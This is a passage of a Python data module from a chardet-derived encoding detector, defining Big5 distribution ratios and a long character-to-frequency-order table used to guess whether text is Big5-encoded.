# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
# Original Work: Copyright (c) 2018 Character Encoding Detector contributors. https://github.com/chardet
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
#Char to FreqOrder table
BIG5_TABLE_SIZE = 5376
BIG5_CHAR_TO_FREQ_ORDER = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
63,5010,5011, 317,1614, 75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, # 64
3682, 3, 10,3973,1471, 29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, # 80
4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947, 34,3556,3204, 64, 604, # 96
5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337, 72, 406,5017, 80, # 112
630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449, 69,2987, 591, # 128
179,2096, 471, 115,2035,1844, 60, 50,2988, 134, 806,1869, 734,2036,3454, 180, # 144
995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, # 160
2502, 90,2716,1338, 663, 11, 906,1099,2553, 20,2441, 182, 532,1716,5019, 732, # 176
1376,4204,1311,1420,3206, 25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, # 192
3276, 475,1447,3683,5020, 117, 21, 656, 810,1297,2300,2334,3557,5021, 126,4205, # 208
706, 456, 150, 613,4513, 71,1118,2037,4206, 145,3092, 85, 835, 486,2115,1246, # 224
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, # 240
3558,3135,5023,1956,1153,4207, 83, 296,1199,3093, 192, 624, 93,5024, 822,1898, # 256
2823,3136, 795,2065, 991,1554,1542,1592, 27, 43,2867, 859, 139,1456, 860,4514, # 272
437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, # 288
3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, # 304
1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, # 320
5026,5027,2176,3207,3685,2682, 593, 845,1062,3277, 88,1723,2038,3978,1951, 212, # 336
266, 152, 149, 468,1899,4208,4516, 77, 187,5028,3038, 37, 5,2990,5029,3979, # 352
5030,5031, 39,2524,4517,2908,3208,2079, 55, 148, 74,4518, 545, 483,1474,1029, # 368
1665, 217,1870,1531,3138,1104,2655,4209, 24, 172,3562, 900,3980,3563,3564,4519, # 384
32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683, 4,3039,3351,1427,1789, # 400
188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, # 416
3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439, 38,5037,1063,5038, 794, # 432
3982,1435,2301, 46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804, 35, 707, # 448
324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, # 464
2129,1363,3689,1423, 697, 100,3094, 48, 70,1231, 495,3139,2196,5043,1294,5044, # 480
2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, # 496
314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, # 512
287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, # 528
3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, # 544
1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, # 560
1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, # 576
1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381, 7, # 592
2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, # 608
265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, # 624
4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, # 640
1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, # 656
5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, # 672
2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, # 688
383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, # 704
98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, # 720
523,2789,2790,2658,5061, 141,2235,1333, 68, 176, 441, 876, 907,4220, 603,2602, # 736
710, 171,3464, 404, 549, 18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, # 752
5063,2991, 368,5064, 146, 366, 99, 871,3693,1543, 748, 807,1586,1185, 22,2263, # 768
379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, # 784
1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068, 59,5069, # 800
585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, # 816
690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, # 832
5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, # 848
1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, # 864
544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, # 880
3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, # 896
4224, 57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, # 912
3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, # 928
279,3145, 51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, # 944
610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, # 960
1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, # 976
4227,2475,1436, 953,4228,2055,4545, 671,2400, 79,4229,2446,3285, 608, 567,2689, # 992
3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008
3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024
2402,5097,5098,5099,4232,3045, 0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040
5101, 233,4233,3697,1819,4550,4551,5102, 96,1777,1315,2083,5103, 257,5104,1810, # 1056
3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072
5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088
1484,5110,1712, 127, 67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104
2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120
1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136
78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152
1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168
4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184
3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200
534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216
165, 243,4559,3703,2528, 123, 683,4239, 764,4560, 36,3998,1793, 589,2916, 816, # 1232
626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248
2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264
5122, 611,1156, 854,2386,1316,2875, 2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280
1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296
2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312
1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328
1994,5135,4564,5136,5137,2198, 13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344
5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360
5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376
5149, 128,2133, 92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392
3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408
4567,2252, 94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424
4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440
2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456
5163,2337,2068, 23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472
3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488
598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504
5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863, 41, # 1520
5170,5171,4575,5172,1657,2338, 19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536
1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552
2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568
3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584
4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600
5182,2692, 733, 40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616
3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632
4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648
1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664
1871,2762,3004,5187, 435,5188, 343,1108, 596, 17,1751,4579,2239,3477,3709,5189, # 1680
4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696
1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712
240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728
1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744
1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760
3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776
619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792
5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808
2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824
1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840
1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551, 30,2268,4266, # 1856
5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872
829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888
4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904
375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920
2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936
444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952
1041,3005, 293,1168, 87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968
1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984
730,1515, 184,2840, 66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000
4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016
4021,5231,5232,1186, 15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032
1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048
3596,1342,1681,1718, 766,3297, 286, 89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064
5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080
5240,3298, 310, 313,3482,2304, 770,4278, 54,3054, 189,4611,3105,3848,4025,5241, # 2096
1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112
2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128
1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144
3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160
2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176
3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192
2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208
4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224
4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240
3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256
97, 81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272
3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288
424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304
3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320
4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336
3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352
1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368
5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384
199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400
5286, 587, 14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416
1702,1226, 102,1547, 62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432
391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448
4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294, 86,1494,1730, # 2464
4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480
397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496
2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512
2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885, 28,2695, # 2528
3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544
1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560
4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576
2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592
1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608
1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624
2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640
3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656
1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672
5313,3493,5314,5315,5316,3310,2698,1433,3311, 131, 95,1504,4049, 723,4303,3166, # 2688
1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704
4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654, 53,5320,3014,5321, # 2720
1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736
135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752
1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768
4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784
4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800
2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816
1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832
4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848
660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864
5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880
2322,3316,5346,5347,4308,5348,4309, 84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896
3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912
4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928
790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944
5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960
5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976
1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992
4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008
4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024
2699,1516,3614,1121,1082,1329,3317,4073,1449,3873, 65,1128,2848,2927,2769,1590, # 3040
3874,5370,5371, 12,2668, 45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056
3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072
2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088
1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104
4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120
3736,1859, 91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136
3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152
2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168
4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771, 61,4079,3738,1823,4080, # 3184
5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200
3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216
2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232
3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248
1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264
2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280
3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296
4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063, 56,1396,3113, # 3312
2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328
2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344
5418,1076, 49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360
1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376
2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392
1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408
3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424
4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629, 31,2851, # 3440
2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456
3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472
3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488
2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504
4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520
2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536
3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552
4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568
5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584
3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600
194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616
1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412, 42,3119, 464,5455,2642, # 3632
4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648
1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664
4701,5462,3020, 962, 588,3629, 289,3250,2644,1116, 52,5463,3067,1797,5464,5465, # 3680
5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696
510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712
5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728
5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744
2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760
3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776
2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792
2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808
681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824
1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840
4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856
3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872
3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888
838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904
2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920
625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936
2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952
4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968
1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984
4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000
1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016
3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032
574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048
3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064
5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080
5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096
3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112
3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128
1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144
2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160
5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176
1561,2674,1452,4113,1375,5549,5550, 47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192
1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208
3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224
919,2352,2975,2353,1270,4727,4115, 73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240
1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256
4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272
5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288
2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304
3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320
516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336
1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352
2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368
2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384
5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400
5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416
